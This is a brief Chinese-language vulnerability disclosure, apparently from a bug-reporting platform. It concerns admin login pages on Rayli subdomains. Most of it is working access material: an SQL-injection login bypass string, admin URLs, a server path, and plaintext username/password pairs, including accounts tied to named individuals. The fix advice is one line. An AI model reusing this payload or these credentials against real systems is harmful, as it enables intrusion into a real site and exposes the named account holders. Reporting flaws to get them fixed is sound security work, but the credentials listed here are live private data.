瑞麗 分站后臺弱口令+SQL注入,不是廢棄的
用'or''=''or''='嘗試登錄后帳號密碼自己就跳出來了
http://lifestyle.rayli.com.cn/manager/index.php->/data/www/wwwroot/lifestyle/
http://lifestyle.rayli.com.cn/manager/login.php
admin admin
liulongjun liulongjun@rayli
zengyujie zengyujie@rayli
http://video.rayli.com.cn/ec/
admin admin
漏洞證明:
修復方案:
改密碼,過濾參數(shù)...
作者 zhk